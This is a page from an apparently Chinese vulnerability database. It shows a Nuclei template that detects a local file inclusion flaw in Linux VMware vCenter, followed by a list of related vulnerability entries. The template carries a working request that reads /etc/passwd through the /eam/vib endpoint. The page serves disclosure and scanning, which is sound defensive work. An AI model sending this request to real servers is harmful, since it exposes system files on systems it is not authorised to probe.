vmware-vcenter-lfi-linux: Linux Vmware Vcenter - Local File Inclusion

漏洞描述

PoC代码[已公开]

id: vmware-vcenter-lfi-linux

info:
  name: Linux Vmware Vcenter - Local File Inclusion
  author: PR3R00T
  severity: high
  description: Linux appliance based Vmware Vcenter is vulnerable to local file inclusion.
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  metadata:
    max-request: 1
  tags: vmware,lfi,vcenter,linux,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/eam/vib?id=/etc/passwd"

    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"
# digest: 4b0a00483046022100956af9c5c07b73720788deb52f3111516a70edd6a198a22fc234eec811224ac10221009f0c598d9d05000021e0345275842d09f9a2ae8a936faaa60b7d19420c978fab:922c64590222798bb761d5b6d8e72950

相关漏洞推荐

• POC CVE-2025-68645: Zimbra Collaboration - Local File Inclusion
• Linux ABRT 需授权 命令注入漏洞 可导致权限提升
• POC CVE-2020-11732: Media Library Assistant < 2.82 - Unauthenticated Limited Local File Inclusion
• POC CVE-2023-5815: News & Blog Designer Pack – WordPress Blog Plugin <= 3.4.1 - Unauthenticated Local File Inclusion
• POC CVE-2025-13315: Twonky Server 8.5.2 on Linux and Windows - Log File Exposure
• POC CVE-2025-31486: Vite server.fs.deny Bypass - Local File Inclusion
• POC gradio-lfi: Gradio - Local File Inclusion
• （CVE-2025-41250）VMware vCenter SMTP头部注入漏洞
• (CVE-2023-53408) Linux内核trace/blktrace内存泄漏漏洞
• （CVE-2023-53409）Linux内核debugfs_lookup()内存泄漏漏洞
• (CVE-2023-53418) Linux内核USB gadget lpc32xx_udc内存泄漏漏洞
• (CVE-2023-53416) Linux内核USB isp1362驱动内存泄漏漏洞
• （CVE-2023-53413）Linux内核USB驱动isp116x内存泄漏漏洞